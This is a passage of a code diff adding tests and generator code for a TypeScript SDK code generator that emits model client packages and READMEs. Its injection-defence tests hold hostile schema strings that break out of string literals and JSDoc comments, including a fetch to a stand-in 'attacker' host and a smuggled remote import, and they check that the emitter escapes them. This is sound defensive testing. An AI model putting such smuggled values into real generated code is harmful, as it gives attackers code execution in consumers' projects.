+    // absent; consumers reach the hooks through the re-export in
+    // `src/index.ts`.
+    expect(pkgJson.exports).toEqual({
+      ".": {
+        types: "./dist/index.d.ts",
+        import: "./dist/index.mjs",
+        require: "./dist/index.js",
+      },
+    });
+    expect(pkgJson.peerDependencies).toEqual({ react: ">=18" });
+    expect(pkgJson.devDependencies.react).toBeDefined();
+    expect(pkgJson.devDependencies["@types/react"]).toBeDefined();
+    expect(pkgJson.keywords).toContain("react");
+    expect(pkgJson.keywords).toContain("hooks");
+  });
+
+  it("tsup.config.ts keeps a single entry — bundler follows the re-export", () => {
+    const tsup = reactPkg().files.find(
+      (f) => f.path === "tsup.config.ts",
+    )!.content;
+    // Only `src/index.ts` is compiled; tsup follows `export * from
+    // "./react.js"` to bundle the React file into the same output.
+    expect(tsup).toContain('entry: ["src/index.ts"]');
+    expect(tsup).not.toContain("src/react.ts");
+  });
+
+  it("the React file stays deterministic for a given input", () => {
+    const opts = {
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: schema({
+        events: [{ name: "set_prompt", description: "", fields: {} }],
+        messages: [{ name: "prompt_accepted", description: "", fields: {} }],
+        tracks: [{ name: "main", kind: "video", direction: "out" } as const],
+      }),
+      outputDir: "/tmp/ignored",
+      react: true,
+    };
+    const a = generateModelSdk(opts);
+    const b = generateModelSdk(opts);
+    expect(a).toEqual(b);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Message envelope unwrap contract.
+//
+// The SDK's `reactor.on("message", …)` hands callers the inner envelope
+// `{ type, data, uploads? }` verbatim — a field declared on a message
+// schema therefore lives at `msg.data.<field>`, not `msg.<field>`.
+// The emitted message interfaces are flat (`{ type, <field> }`) for
+// ergonomics, so every generated handler wrapper flattens `raw.data`
+// up to the top level before handing the value to the typed callback.
+//
+// These tests pin down that the generated code always goes through
+// `_unwrapMessage` on the way out so the typed shape matches what
+// users actually receive at runtime. Bug was filed after v0.8.4 of
+// `@reactor-models/helios` shipped with unwrapped casts — handlers
+// saw `msg.current_frame === undefined` because the value actually
+// sat at `msg.data.current_frame`.
+// ---------------------------------------------------------------------------
+
+describe("emitter — message envelope unwrap (REA-1581 follow-up)", () => {
+  function buildPkg(
+    overrides: Partial<ModelSchema> = {},
+    react = false,
+  ): ReturnType<typeof generateModelSdk> {
+    return generateModelSdk({
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: {
+        modelName: "helios",
+        modelVersion: "0.1.0",
+        events: [],
+        messages: [{ name: "state", description: "", fields: {} }],
+        tracks: [],
+        ...overrides,
+      },
+      outputDir: "/tmp/ignored",
+      react,
+    });
+  }
+
+  it("emits the `_unwrapMessage` helper in src/index.ts when the schema has messages", () => {
+    const src = buildPkg().files.find(
+      (f) => f.path === "src/index.ts",
+    )!.content;
+    expect(src).toContain("function _unwrapMessage<T>(raw: unknown): T {");
+    // The helper re-applies `type` after the spread so a payload that
+    // happens to carry a `type` field cannot shadow the discriminator.
+    expect(src).toContain("...env.data, type: env.type");
+  });
+
+  it("omits the `_unwrapMessage` helper in src/index.ts when the schema has no messages (no dead code)", () => {
+    const src = buildPkg({ messages: [] }).files.find(
+      (f) => f.path === "src/index.ts",
+    )!.content;
+    expect(src).not.toContain("_unwrapMessage");
+  });
+
+  it("uses `_unwrapMessage` inside the class's onMessage wrapper instead of a naked cast", () => {
+    const src = buildPkg().files.find(
+      (f) => f.path === "src/index.ts",
+    )!.content;
+    expect(src).toContain("handler(_unwrapMessage<HeliosMessage>(raw));");
+    // Guard against the old buggy pattern creeping back.
+    expect(src).not.toContain("handler(raw as HeliosMessage);");
+  });
+
+  it("on<Name> helpers inherit the unwrap via this.onMessage", () => {
+    const src = buildPkg({
+      messages: [{ name: "state", description: "", fields: {} }],
+    }).files.find((f) => f.path === "src/index.ts")!.content;
+    // `onState` calls `this.onMessage(...)` which already unwraps, so
+    // `msg.type` here is the post-unwrap discriminator, not a raw
+    // envelope field.
+    expect(src).toContain("return this.onMessage((msg) => {");
+    expect(src).toContain('if (msg.type === "state") handler(msg as');
+  });
+
+  it("emits the `_unwrapMessage` helper in src/react.ts when the schema has messages", () => {
+    const react = buildPkg({}, true).files.find(
+      (f) => f.path === "src/react.ts",
+    )!.content;
+    expect(react).toContain("function _unwrapMessage<T>(raw: unknown): T {");
+  });
+
+  it("omits the `_unwrapMessage` helper in src/react.ts when there are no messages", () => {
+    const react = buildPkg({ messages: [] }, true).files.find(
+      (f) => f.path === "src/react.ts",
+    )!.content;
+    expect(react).not.toContain("_unwrapMessage");
+  });
+
+  it("React catch-all useHeliosMessage unwraps before handing to the handler", () => {
+    const react = buildPkg({}, true).files.find(
+      (f) => f.path === "src/react.ts",
+    )!.content;
+    expect(react).toContain(
+      "handler(_unwrapMessage<HeliosMessage>(msg)),\n  );",
+    );
+    // Guard against the old buggy pattern creeping back.
+    expect(react).not.toContain("handler(msg as HeliosMessage)");
+  });
+
+  it("React per-message hook runs the discriminator against the unwrapped object, not the envelope", () => {
+    const react = buildPkg(
+      {
+        messages: [{ name: "state", description: "", fields: {} }],
+      },
+      true,
+    ).files.find((f) => f.path === "src/react.ts")!.content;
+    expect(react).toContain("const m = _unwrapMessage<HeliosMessage>(msg);");
+    expect(react).toContain('if (m.type === "state") {');
+    // The prior buggy form compared against the raw envelope.
+    expect(react).not.toContain('(msg as HeliosMessage).type === "state"');
+  });
+
+  // The algorithmic contract the helper has to satisfy: flatten
+  // `raw.data` up; preserve `raw.type` as the winning discriminator;
+  // pass non-enveloped input through unchanged. Rewriting the body in
+  // plain JS below is strictly more reliable than evaling a TS string
+  // snippet — the snippet itself is pinned down by the string-presence
+  // tests above, so if the emitter ever diverges from this reference
+  // behaviour the other tests catch it.
+  function referenceUnwrap(raw: unknown): unknown {
+    const env = raw as {
+      type?: string;
+      data?: Record<string, unknown>;
+    };
+    if (
+      env &&
+      typeof env === "object" &&
+      env.data &&
+      typeof env.data === "object"
+    ) {
+      return { ...env.data, type: env.type };
+    }
+    return raw;
+  }
+
+  it("reference unwrap flattens the SDK's `{ type, data, uploads }` envelope so message fields sit at the top level", () => {
+    const envelope = {
+      type: "state",
+      data: { current_frame: 42, ready: true },
+      uploads: { ignored: {} },
+    };
+    const out = referenceUnwrap(envelope) as {
+      type: string;
+      current_frame: number;
+      ready: boolean;
+    };
+    expect(out.type).toBe("state");
+    expect(out.current_frame).toBe(42);
+    expect(out.ready).toBe(true);
+  });
+
+  it("reference unwrap re-applies the top-level `type` last so a payload can't shadow the discriminator", () => {
+    const collision = { type: "state", data: { type: "impostor", x: 1 } };
+    const out = referenceUnwrap(collision) as { type: string; x: number };
+    expect(out.type).toBe("state");
+    expect(out.x).toBe(1);
+  });
+
+  it("reference unwrap passes non-enveloped input through untouched (belt-and-suspenders)", () => {
+    const flat = { type: "state", current_frame: 7 };
+    expect(referenceUnwrap(flat)).toEqual(flat);
+    expect(referenceUnwrap(null)).toBe(null);
+    expect(referenceUnwrap(undefined)).toBe(undefined);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Injection-defence: emitter never trusts IR strings.
+//
+// The parser rejects hostile names at ingress, but the emitter is a
+// separate layer — if the parser ever regresses or someone builds a
+// `ModelSchema` by hand (as these tests do) the emitter must still
+// produce TypeScript that parses, not TypeScript that executes
+// attacker-controlled code at import time. These tests construct hostile
+// IR directly to keep the emitter honest on its own.
+// ---------------------------------------------------------------------------
+
+describe("emitter — injection defence (defense in depth)", () => {
+  function hostileBase(overrides: Partial<ModelSchema> = {}): ModelSchema {
+    return {
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      events: [],
+      messages: [],
+      tracks: [],
+      ...overrides,
+    };
+  }
+
+  it("escapes a hostile event name inside sendCommand(…) string literal", () => {
+    const pkg = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: hostileBase({
+        events: [
+          {
+            name: 'set_prompt"; evil(); "',
+            description: "",
+            fields: {},
+          },
+        ],
+      }),
+      outputDir: "/tmp/ignored",
+    });
+    const src = pkg.files.find((f) => f.path === "src/index.ts")!.content;
+
+    // With JSON.stringify, the `"` becomes `\"` inside the JS literal
+    // — the `sendCommand` call still receives exactly one string arg.
+    expect(src).toContain('sendCommand("set_prompt\\"; evil(); \\"", {});');
+    expect(src).not.toMatch(/sendCommand\("set_prompt"; evil\(\); ""/);
+  });
+
+  it("escapes a hostile message name in the discriminator literal", () => {
+    const pkg = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: hostileBase({
+        messages: [
+          {
+            name: 'prompt_accepted"; evil()',
+            description: "",
+            fields: {},
+          },
+        ],
+      }),
+      outputDir: "/tmp/ignored",
+    });
+    const src = pkg.files.find((f) => f.path === "src/index.ts")!.content;
+
+    // Both sinks — `type: "…";` in the interface and `msg.type === "…"`
+    // in the per-message listener — must emit an escaped literal.
+    expect(src).toContain('type: "prompt_accepted\\"; evil()";');
+    expect(src).toContain(
+      'if (msg.type === "prompt_accepted\\"; evil()") handler(msg as',
+    );
+  });
+
+  it("escapes MODEL_NAME / MODEL_VERSION string literals", () => {
+    const pkg = generateModelSdk({
+      modelName: "helios",
+      modelVersion: '1.0.0"; globalThis.pwned = true; "',
+      sdkVersion: "2.9.1",
+      schema: hostileBase({
+        modelName: "helios",
+        modelVersion: '1.0.0"; globalThis.pwned = true; "',
+      }),
+      outputDir: "/tmp/ignored",
+    });
+    const src = pkg.files.find((f) => f.path === "src/index.ts")!.content;
+
+    expect(src).toContain(
+      'export const MODEL_VERSION = "1.0.0\\"; globalThis.pwned = true; \\"" as const;',
+    );
+    // The raw breakout sequence must never appear unescaped in the source.
+    expect(src).not.toContain('"1.0.0"; globalThis.pwned');
+  });
+
+  it("neutralises a `*/` in a field description inside JSDoc", () => {
+    // Worst-case real-world vector: a description containing a literal
+    // `*/` would close the JSDoc block and let the trailing prose land
+    // as top-level code at import time. sanitizeJsDocLine inside
+    // generateJsDoc is the last line of defence for this sink.
+    const pkg = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: hostileBase({
+        events: [
+          {
+            name: "set_prompt",
+            description: "",
+            fields: {
+              prompt: {
+                type: "string",
+                description: "The prompt. */ await fetch('attacker'); /*",
+              },
+            },
+          },
+        ],
+      }),
+      outputDir: "/tmp/ignored",
+    });
+    const src = pkg.files.find((f) => f.path === "src/index.ts")!.content;
+
+    expect(src).toContain("*\\/ await fetch('attacker');");
+    expect(src).not.toContain("*/ await fetch('attacker');");
+  });
+
+  it("collapses newlines inside descriptions so nothing escapes a line", () => {
+    const pkg = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: hostileBase({
+        events: [
+          {
+            name: "set_prompt",
+            description: "first line\nimport 'http://attacker/'",
+            fields: {},
+          },
+        ],
+      }),
+      outputDir: "/tmp/ignored",
+    });
+    const src = pkg.files.find((f) => f.path === "src/index.ts")!.content;
+
+    // The smuggled `import` must stay inside the JSDoc body where
+    // sanitizeJsDocLine collapsed it next to `first line`; it must not
+    // appear at column 0 of any emitted line.
+    expect(src).toContain("first line import 'http://attacker/'");
+    expect(src).not.toMatch(/^import 'http:\/\/attacker\/'$/m);
+  });
+});

--- a/packages/codegen/__tests__/readme-emitter.test.ts
+++ b/packages/codegen/__tests__/readme-emitter.test.ts
@@ -1,0 +1,237 @@
+// Copyright (c) 2026 Reactor Technologies, Inc. All rights reserved.
+
+import { describe, expect, it } from "vitest";
+
+import { generateModelSdk } from "../src/codegen.js";
+import { __testing__ } from "../src/readme-emitter.js";
+import type { ModelSchema } from "../src/types.js";
+
+// ---------------------------------------------------------------------------
+// README emission — schema-driven JS/React docs with a generic auth flow
+// pulled from the committed template.
+//
+// Tests drive through `generateModelSdk` so the whole pipeline (template
+// load → placeholder substitution → per-event/message/track rendering)
+// is exercised; assertions pick the `README.md` entry out of the
+// generated file list to scope the check.
+// ---------------------------------------------------------------------------
+
+function schema(overrides: Partial<ModelSchema> = {}): ModelSchema {
+  return {
+    modelName: "helios",
+    modelVersion: "0.1.0",
+    events: [],
+    messages: [],
+    tracks: [],
+    ...overrides,
+  };
+}
+
+describe("README emission", () => {
+  function readmeFor(overrides: Partial<ModelSchema> = {}): string {
+    const merged = schema({ modelVersion: "1.0.5", ...overrides });
+    const pkg = generateModelSdk({
+      modelName: merged.modelName,
+      modelVersion: merged.modelVersion,
+      sdkVersion: "2.9.1",
+      schema: merged,
+      outputDir: "/tmp/ignored",
+    });
+    return pkg.files.find((f) => f.path === "README.md")!.content;
+  }
+
+  it("substitutes model name / prefix / version into the template header", () => {
+    const md = readmeFor();
+    expect(md).toContain("# @reactor-models/helios");
+    // `formatVersionForHeader` normalises the leading v.
+    expect(md).toContain("Version **v1.0.5**");
+    expect(md).toContain("npm install @reactor-models/helios");
+  });
+
+  it("imports the React provider from the package root, not a /react subpath", () => {
+    // Everything — plain JS and React — is exported from the package
+    // root; there is no `/react` subpath in the generated SDK or the
+    // rendered README. This locks in the "no subpath" contract so the
+    // template can't accidentally drift back to a `/react` import.
+    const md = readmeFor();
+    expect(md).toContain(
+      'import { HeliosProvider } from "@reactor-models/helios";',
+    );
+    expect(md).not.toContain("@reactor-models/helios/react");
+    expect(md).toContain("https://api.reactor.inc/tokens");
+    expect(md).toContain("Reactor-API-Key");
+    // No unsubstituted placeholders anywhere in the output.
+    expect(md).not.toMatch(/\{\{[A-Z_]+\}\}/);
+  });
+
+  it("drops the auto-gen disclaimer and @reactor-team/js-sdk dependency note", () => {
+    const md = readmeFor();
+    // The noisy "Generated from the model's OpenAPI schema … do not
+    // edit by hand" line lives in every source file header as a code
+    // comment; keeping it in the README too was just duplicated prose.
+    expect(md).not.toMatch(/do not edit by hand/i);
+    expect(md).not.toMatch(/overwritten on every release/i);
+    // The package.json already declares `@reactor-team/js-sdk` as a
+    // dependency — callers don't need to be told in the README.
+    expect(md).not.toMatch(
+      /declares .*@reactor-team\/js-sdk.* as a dependency/i,
+    );
+  });
+
+  it("wires the React examples to the committed /api/reactor/token route", () => {
+    // The template intentionally matches the Next.js route handler's
+    // path — if the route path changes in the template header, the
+    // client-side fetch call below has to move in lockstep or the
+    // examples break silently.
+    const md = readmeFor();
+    expect(md).toContain("app/api/reactor/token/route.ts");
+    expect(md).toContain('fetch("/api/reactor/token", { method: "POST" })');
+    // The Authenticate section still uses `autoConnect: true` (full-app
+    // example with a video feed that wants to connect immediately); the
+    // Connect section deliberately drops it so the simpler "status
+    // indicator" example doesn't demand a running session. The overall
+    // presence check in the JSX-passthrough test below guarantees the
+    // invariant that {{ ... }} object literals survive substitution.
+  });
+
+  it("renders one section per event with a param table + JS/React snippets", () => {
+    const md = readmeFor({
+      events: [
+        {
+          name: "set_prompt",
+          description: "Set and encode the scene prompt.",
+          fields: {
+            prompt: {
+              type: "string",
+              default: "",
+              description: "Scene description.",
+            },
+          },
+        },
+      ],
+    });
+
+    expect(md).toContain("## Events");
+    expect(md).toContain("### `setPrompt`");
+    expect(md).toContain("Set and encode the scene prompt.");
+    // Parameter table header.
+    expect(md).toContain("| Parameter | Type | Required | Description |");
+    // JS + React code blocks for the event.
+    expect(md).toContain("#### JavaScript");
+    expect(md).toContain("await helios.setPrompt({");
+    expect(md).toContain("#### React");
+    expect(md).toContain("const { setPrompt } = useHelios();");
+  });
+
+  it("renders one section per message with listener + hook names", () => {
+    const md = readmeFor({
+      messages: [
+        {
+          name: "prompt_accepted",
+          description: "The prompt was accepted.",
+          fields: { prompt: { type: "string" } },
+        },
+      ],
+    });
+
+    expect(md).toContain("## Messages");
+    expect(md).toContain("### `prompt_accepted`");
+    expect(md).toContain("Listener: `onPromptAccepted`");
+    expect(md).toContain("React hook: `useHeliosPromptAccepted`");
+    // JS snippet wires the on<Name> listener via the class instance.
+    expect(md).toContain("helios.onPromptAccepted((msg) =>");
+    // React snippet uses the typed hook.
+    expect(md).toContain("useHeliosPromptAccepted((msg) =>");
+  });
+
+  it("escapes pipe chars in enum union types so GFM tables don't break", () => {
+    // Regression: enum fields render as `"a" | "b" | "c"` — the literal
+    // pipes terminate the parameter-table cell unless backslash-escaped.
+    // Before the fix, the Helios `sr_scale` row rendered as
+    //   | `sr_scale` | `"off" | "2x" | "4x"` | ... |
+    // which GFM parsed as 6 cells, pushing the description into the wrong
+    // column. Check the escaped form is emitted verbatim.
+    const md = readmeFor({
+      events: [
+        {
+          name: "set_sr_scale",
+          description: "Set super-resolution factor.",
+          fields: {
+            sr_scale: {
+              type: "string",
+              enum: ["off", "2x", "4x"],
+              default: "2x",
+              description: "Upscaling factor.",
+            },
+          },
+        },
+      ],
+    });
+    expect(md).toContain('`"off" \\| "2x" \\| "4x"`');
+    // And — paranoid check — the unescaped form must not leak in.
+    expect(md).not.toContain('`"off" | "2x" | "4x"`');
+  });
+
+  it("renders a tracks table with the schema → transport direction map", () => {
+    const md = readmeFor({
+      tracks: [
+        { name: "main_video", kind: "video", direction: "out" as const },
+        { name: "webcam", kind: "video", direction: "in" as const },
+      ],
+    });
+    expect(md).toContain("## Tracks");
+    expect(md).toContain("| `main_video` | video | out | `recvonly` |");
+    expect(md).toContain("| `webcam` | video | in | `sendonly` |");
+  });
+
+  it("cross-links backticked message names in event descriptions", () => {
+    const md = readmeFor({
+      events: [
+        {
+          name: "set_prompt",
+          description: "Emits `prompt_accepted` when scheduled.",
+          fields: {},
+        },
+      ],
+      messages: [{ name: "prompt_accepted", description: "", fields: {} }],
+    });
+    // Description body gets the token replaced with a markdown link.
+    expect(md).toContain("Emits [`prompt_accepted`](#prompt_accepted)");
+    // …and the dedicated "Emits:" line under the event is present too.
+    expect(md).toMatch(/Emits: \[`prompt_accepted`\]\(#prompt_accepted\)/);
+  });
+
+  it("falls back gracefully when the schema has no events or messages", () => {
+    const md = readmeFor({ events: [], messages: [], tracks: [] });
+    // Header + install + auth + connect still rendered…
+    expect(md).toContain("# @reactor-models/helios");
+    expect(md).toContain("## Authenticate");
+    // …but none of the dynamic section headings appear without content.
+    expect(md).not.toContain("## Events");
+    expect(md).not.toContain("## Messages");
+    expect(md).not.toContain("## Tracks");
+  });
+
+  it("renderTemplate is strict about missing placeholders", () => {
+    const { renderTemplate } = __testing__;
+    // Known placeholders work.
+    expect(renderTemplate("hi {{MODEL_NAME}}", { MODEL_NAME: "helios" })).toBe(
+      "hi helios",
+    );
+    // Unknown placeholders throw loudly — we'd rather fail the build
+    // than ship literal `{{X}}` in a README.
+    expect(() => renderTemplate("{{UNKNOWN}}", {})).toThrow(
+      /Unknown README placeholder \{\{UNKNOWN\}\}/,
+    );
+  });
+
+  it("leaves JSX object expressions in the template untouched", () => {
+    // The regex for placeholders is `\{\{[A-Z_]+\}\}` with no
+    // whitespace inside the braces, so JSX like
+    // `connectOptions={{ autoConnect: true }}` should survive
+    // substitution unchanged — a smoke test that protects that
+    // invariant if anyone tightens the regex later.
+    const md = readmeFor();
+    expect(md).toContain("connectOptions={{ autoConnect: true }}");
+  });
+});

--- a/packages/codegen/package.json
+++ b/packages/codegen/package.json
@@ -14,7 +14,8 @@
   },
   "files": [
     "dist",
-    "README.md"
+    "README.md",
+    "templates"
   ],
   "scripts": {
     "build": "tsup",

--- a/packages/codegen/src/codegen.ts
+++ b/packages/codegen/src/codegen.ts
@@ -1,0 +1,29 @@
+// Copyright (c) 2026 Reactor Technologies, Inc. All rights reserved.
+
+import * as fs from "node:fs";
+import * as path from "node:path";
+import type { CodegenOptions, GeneratedPackage } from "./types.js";
+import { generator } from "./emitter.js";
+
+export { loadSchema, parseSchema } from "./openapi/index.js";
+
+/**
+ * Produce the in-memory representation of a generated model SDK package.
+ * Pure: no I/O, no network, deterministic.
+ */
+export function generateModelSdk(options: CodegenOptions): GeneratedPackage {
+  return generator.generate(options);
+}
+
+/**
+ * Write a {@link GeneratedPackage} to disk under `outputDir`. Missing
+ * parent directories are created as needed. Existing files with the
+ * same path are overwritten.
+ */
+export function writePackage(pkg: GeneratedPackage, outputDir: string): void {
+  for (const file of pkg.files) {
+    const filePath = path.join(outputDir, file.path);
+    fs.mkdirSync(path.dirname(filePath), { recursive: true });
+    fs.writeFileSync(filePath, file.content, "utf-8");
+  }
+}

--- a/packages/codegen/src/emitter.ts
+++ b/packages/codegen/src/emitter.ts
@@ -1,0 +1,1080 @@
+// Copyright (c) 2026 Reactor Technologies, Inc. All rights reserved.
+
+import type {
+  CodegenOptions,
+  EventSchema,
+  FieldSchema,
+  GeneratedPackage,
+  MessageSchema,
+  TrackSchema,
+} from "./types.js";
+import { generateReadme } from "./readme-emitter.js";
+
+// ---------------------------------------------------------------------------
+// String helpers
+// ---------------------------------------------------------------------------
+
+export function toPascalCase(snake: string): string {
+  return snake
+    .split("_")
+    .map((w) => w.charAt(0).toUpperCase() + w.slice(1))
+    .join("");
+}
+
+export function toCamelCase(snake: string): string {
+  const pascal = toPascalCase(snake);
+  return pascal.charAt(0).toLowerCase() + pascal.slice(1);
+}
+
+function indent(text: string, level: number): string {
+  const pad = "  ".repeat(level);
+  return text
+    .split("\n")
+    .map((line) => (line.trim() ? pad + line : line))
+    .join("\n");
+}
+
+function enumValueToTs(v: string | number | boolean): string {
+  // `JSON.stringify` produces a valid JS string literal with every
+  // control / quote / backslash byte properly escaped. The TS grammar
+  // accepts the exact same literal form, so the output is both valid
+  // and injection-safe even if the schema smuggled a `"` or newline
+  // past the parser's name validators.
+  if (typeof v === "string") return JSON.stringify(v);
+  return String(v);
+}
+
+/**
+ * Strip Reactor's `-g<sha>` git-describe suffix from a version string.
+ * Reactor model release tags follow the `v<MAJOR>.<MINOR>.<PATCH>-g<sha>`
+ * convention (see `internal/tooling/releaser` in the main repo) and the
+ * short SHA is noise from every consumer's perspective:
+ *
+ *   - README readers want to know `v0.8.3`, not `v0.8.3-g404f6950`.
+ *   - The emitted `MODEL_VERSION` constant is used by apps for display
+ *     and telemetry; the SHA only adds jitter across otherwise-identical
+ *     builds.
+ *   - `npm pack` derives the tarball filename from `package.json`'s
+ *     `version`; keeping the SHA means every no-op republish ships a
+ *     differently-named artefact.
+ *
+ * The regex is deliberately narrow (`-g` followed by one or more hex
+ * chars at the end of the string) so legitimate semver pre-release
+ * suffixes like `-beta.3` or `-rc.1` pass through untouched.
+ */
+export function stripBuildMetadata(version: string): string {
+  return version.replace(/-g[0-9a-f]+$/i, "");
+}
+
+/**
+ * Format a schema `info.version` for the `// Model: <name> v<version>`
+ * banner. Schemas that already prefix their version with `v` (e.g.
+ * `"v0.0.0"`) would otherwise get a stuttering `vv0.0.0`, so we
+ * normalise on a single leading `v`. The git-describe suffix is
+ * stripped first via {@link stripBuildMetadata} so the banner reads as
+ * `v0.8.3` rather than `v0.8.3-g404f6950` — the SHA is CI plumbing,
+ * not information a human reading the generated source cares about.
+ */
+export function formatVersionForHeader(version: string): string {
+  const base = stripBuildMetadata(version);
+  return base.startsWith("v") ? base : `v${base}`;
+}
+
+/**
+ * Normalise a schema `info.version` for the generated `package.json`'s
+ * `"version"` field. Two operations, in this order:
+ *
+ *   1. Strip the Reactor git-describe `-g<sha>` suffix (see
+ *      {@link stripBuildMetadata}) so the tarball name and the
+ *      published npm version are stable across rebuilds of the same
+ *      semver triple.
+ *   2. Strip a leading `v` so npm's strict-semver validator accepts
+ *      the value (Reactor release tags commonly start with `v`).
+ *
+ * Consumers see exactly `MAJOR.MINOR.PATCH[-prerelease]` on npm,
+ * regardless of how the schema author wrote the original tag.
+ */
+function formatVersionForPackageJson(version: string): string {
+  const base = stripBuildMetadata(version);
+  return base.startsWith("v") ? base.slice(1) : base;
+}
+
+/**
+ * Format a schema `info.version` for emission as the `MODEL_VERSION`
+ * exported constant. Drops the `-g<sha>` suffix so the value developers
+ * read at runtime matches the one printed in the README and the header
+ * banner, but keeps any leading `v` the schema author wrote — this
+ * constant is for display, not for npm semver.
+ */
+function formatVersionForModelConstant(version: string): string {
+  return stripBuildMetadata(version);
+}
+
+const UPLOAD_REF_FORMATS = new Set([
+  "reactor-upload-reference",
+  "file-reference",
+]);
+
+export function isUploadReference(field: FieldSchema): boolean {
+  return (
+    field.type === "object" &&
+    !!field.format &&
+    UPLOAD_REF_FORMATS.has(field.format)
+  );
+}
+
+export function fieldSchemaToTsType(field: FieldSchema): string {
+  if (isUploadReference(field)) {
+    return "FileRef";
+  }
+  if (field.enum && field.enum.length > 0) {
+    return field.enum.map(enumValueToTs).join(" | ");
+  }
+  switch (field.type) {
+    case "string":
+      return "string";
+    case "integer":
+    case "number":
+      return "number";
+    case "boolean":
+      return "boolean";
+    case "object":
+      return "Record<string, unknown>";
+    case "array":
+      return "unknown[]";
+    default:
+      return "unknown";
+  }
+}
+
+export function hasUploadRefParam(event: EventSchema): boolean {
+  return Object.values(event.fields).some(isUploadReference);
+}
+
+// ---------------------------------------------------------------------------
+// Runtime envelope unwrap helper.
+//
+// The SDK's `reactor.on("message", handler)` hands callers the inner
+// envelope exactly as it comes off the data channel — i.e.
+// `{ type, data, uploads? }` — so a field the model's schema declares
+// on a message actually lives at `msg.data.<field>`, not `msg.<field>`.
+// The emitted `<Prefix><Msg>Message` interfaces are flat for developer
+// ergonomics (`msg.current_frame`, not `msg.data.current_frame`), so
+// every generated handler wrapper in this file flattens `raw.data` up
+// to the top level before handing the object to the typed callback.
+//
+// The helper is emitted as a file-local function into both
+// `src/index.ts` (used by the class's `onMessage` / `on<Name>`) and
+// `src/react.ts` (used by `use<Prefix>Message` / `use<Prefix><Msg>`),
+// so neither file has to import anything extra at runtime and the
+// helper never leaks into the generated package's public surface.
+// Duplication is ~12 lines and strictly cheaper than threading a
+// cross-module import seam.
+//
+// `type` is re-applied last so a payload that happens to carry its
+// own `type` field can never shadow the discriminator. Payloads
+// missing the inner `data` wrapper pass through untouched so
+// non-enveloped input degrades gracefully instead of crashing the
+// handler.
+// ---------------------------------------------------------------------------
+
+const UNWRAP_MESSAGE_HELPER = `/**
+ * @internal Flatten the \`{ type, data, uploads? }\` envelope the SDK
+ * hands to \`reactor.on("message", …)\` so a field the model schema
+ * declares on a message is reachable at \`msg.<field>\` — matching the
+ * shape the exported message interfaces promise.
+ */
+function _unwrapMessage<T>(raw: unknown): T {
+  const env = raw as { type?: string; data?: Record<string, unknown> };
+  if (
+    env &&
+    typeof env === "object" &&
+    env.data &&
+    typeof env.data === "object"
+  ) {
+    return { ...env.data, type: env.type } as T;
+  }
+  return raw as T;
+}`;
+
+// Make a free-form prose line safe to drop inside a JSDoc body.
+//
+// Two hostile sequences matter:
+//   - A literal comment-close (asterisk + forward-slash) terminates the
+//     JSDoc block and lets everything after it escape into module scope
+//     as top-level code. At import time in a consumer project this is
+//     arbitrary-code-execution; escaping the slash with a backslash
+//     (asterisk + backslash + slash) keeps IDE tooltips visually
+//     identical while neutering the terminator.
+//   - CR / LF / U+2028 / U+2029 are collapsed so a multi-line
+//     description can't smuggle a trailing newline past the caller's
+//     line-based formatting and land as real code on the line below.
+//
+// Field description values reach this function verbatim from the
+// OpenAPI document (author prose), so the parser deliberately does not
+// constrain them — this function is the last line of defence.
+function sanitizeJsDocLine(line: string): string {
+  return line.replace(/\*\//g, "*\\/").replace(/[\r\n\u2028\u2029]+/g, " ");
+}
+
+function generateJsDoc(lines: string[], indentLevel: number = 0): string {
+  if (lines.length === 0) return "";
+  const pad = "  ".repeat(indentLevel);
+  const safe = lines.map(sanitizeJsDocLine);
+  if (safe.length === 1) return `${pad}/** ${safe[0]} */\n`;
+  const inner = safe.map((l) => `${pad} * ${l}`).join("\n");
+  return `${pad}/**\n${inner}\n${pad} */\n`;
+}
+
+// ---------------------------------------------------------------------------
+// Event (command) param interfaces
+// ---------------------------------------------------------------------------
+
+function generateParamInterface(
+  modelPrefix: string,
+  event: EventSchema,
+): string {
+  const interfaceName = `${modelPrefix}${toPascalCase(event.name)}Params`;
+  const fields = Object.entries(event.fields);
+
+  if (fields.length === 0) return "";
+
+  const lines: string[] = [];
+  const doc = generateJsDoc(event.description ? [event.description] : [], 0);
+  lines.push(`${doc}export interface ${interfaceName} {`);
+
+  for (const [name, field] of fields) {
+    const tsType = fieldSchemaToTsType(field);
+    const optional = field.default !== undefined ? "?" : "";
+    const fieldDoc: string[] = [];
+    if (field.description) fieldDoc.push(field.description);
+    if (field.minimum !== undefined) fieldDoc.push(`@minimum ${field.minimum}`);
+    if (field.maximum !== undefined) fieldDoc.push(`@maximum ${field.maximum}`);
+    if (field.minLength !== undefined)
+      fieldDoc.push(`@minLength ${field.minLength}`);
+    if (field.maxLength !== undefined)
+      fieldDoc.push(`@maxLength ${field.maxLength}`);
+    if (field.default !== undefined)
+      fieldDoc.push(`@default ${JSON.stringify(field.default)}`);
+
+    if (fieldDoc.length > 0) lines.push(indent(generateJsDoc(fieldDoc), 1));
+    lines.push(`  ${name}${optional}: ${tsType};`);
+  }
+
+  lines.push("}");
+  return lines.join("\n");
+}
+
+// ---------------------------------------------------------------------------
+// Message interfaces + discriminated union
+// ---------------------------------------------------------------------------
+
+function generateMessageInterface(
+  modelPrefix: string,
+  message: MessageSchema,
+): string {
+  const interfaceName = `${modelPrefix}${toPascalCase(message.name)}Message`;
+  const fields = Object.entries(message.fields);
+
+  const lines: string[] = [];
+  const doc = generateJsDoc(
+    message.description ? [message.description] : [],
+    0,
+  );
+  lines.push(`${doc}export interface ${interfaceName} {`);
+  lines.push(`  type: ${JSON.stringify(message.name)};`);
+
+  for (const [name, field] of fields) {
+    const tsType = fieldSchemaToTsType(field);
+    const fieldDoc: string[] = [];
+    if (field.description) fieldDoc.push(field.description);
